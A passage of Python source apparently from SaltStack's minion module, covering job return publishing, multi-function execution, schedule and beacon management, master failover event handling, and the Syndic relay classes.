log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
        # Should have been converted to a comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error('Returner {0} could not be loaded: {1}'.format(
returner_str, returner_err))
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
        This method should be used as a threading target; it starts the actual
        minion-side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if data['fun'][ind] != 'saltutil.refresh_pillar' and \
data['fun'][ind] not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if multifunc_ordered:
ret['return'][ind] = func(*args, **kwargs)
ret['retcode'][ind] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'][ind] = True
else:
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['retcode'][data['fun'][ind]] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
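    # Illustrative sketch (hypothetical values): the load built by _return_pub()
    # for an ordinary job return (ret_cmd '_return'); all keys of ret are copied
    # into the load alongside 'cmd' and the minion id.
    #
    #     ret = {'jid': '20170101000000000000', 'fun': 'test.ping',
    #            'return': True, 'retcode': 0, 'success': True}
    #     # -> load = {'cmd': '_return', 'id': <minion id>, 'jid': ..., 'fun': ...,
    #     #            'return': True, 'retcode': 0, 'success': True}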
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning('Cannot run startup_states when \'master_type\' is '
'set to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.')
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
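    # Illustrative sketch (hypothetical job name): the event data dict consumed
    # by manage_schedule(); here 'func': 'add' hands the nested schedule dict to
    # self.schedule.add_job() with persistence enabled.
    #
    #     data = {'func': 'add', 'persist': True,
    #             'schedule': {'my_job': {'function': 'test.ping', 'minutes': 5}}}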
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
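    # Illustrative sketch (hypothetical variables): event data consumed by
    # environ_setenv(); the dict and flags are passed straight through to
    # salt.modules.environ.setenv().
    #
    #     data = {'environ': {'HTTP_PROXY': 'http://proxy:3128', 'OLD_VAR': False},
    #             'false_unsets': True, 'clear_all': False}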
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Minion of "{0}" is handling event tag \'{1}\''.format(self.opts['master'], tag))
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
                yield self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
if self.connected:
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
        elif tag.startswith('__schedule_return'):
            # reporting current connection with master
            if data['schedule'].startswith(master_event(type='alive', master='')):
                if data['return']:
                    log.debug('Connected to master {0}'.format(data['schedule'].split(master_event(type='alive', master=''))[1]))
            self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
            # if the master disconnect event is for a different master, ignore it
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
                # not my master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug('Updating auth data for {0}: {1} -> {2}'.format(
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']))
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
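# Illustrative sketch (not part of the original source): the shape of the event
# package handled above for a locally fired 'fire_master' event. The concrete
# values are assumptions made up for the example.
#   >>> data = {'data': {'custom': 'payload'}, 'tag': 'myapp/custom/event',
#   ...         'events': None, 'pretag': None}
#   >>> # handle_event() forwards this with self._fire_master(data['data'],
#   >>> # data['tag'], data['events'], data['pretag']) when connected.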
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons()
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler()
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering-enabled case, we'd like to know when the minion sees something it shouldn't
log.trace('Broadcast message received not for this minion, Load: {0}'.format(payload['load']))
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
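# Illustrative sketch (assumed values, not from the original source): a
# publication load that passes the checks in _target_load() above.
#   >>> load = {'tgt': 'web*', 'tgt_type': 'glob',
#   ...         'jid': '20190101000000000000', 'fun': 'test.ping', 'arg': []}
#   >>> # 'tgt_type' selects self.matcher.glob_match, which is then called as
#   >>> # glob_match('web*') to decide whether this minion is targeted.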
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion; this minion will use the minion keys on the
master to authenticate with a higher-level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because the Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: {0}'.format(args[1]))
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def _return_pub_multi(self, values):
for value in values:
yield self._return_pub(value,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion; this minion relays jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way), this daemon does not handle failure well;
it will (under most circumstances) stall for ~15s while trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which we were unable to send for some reason and which will be
# re-sent to any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
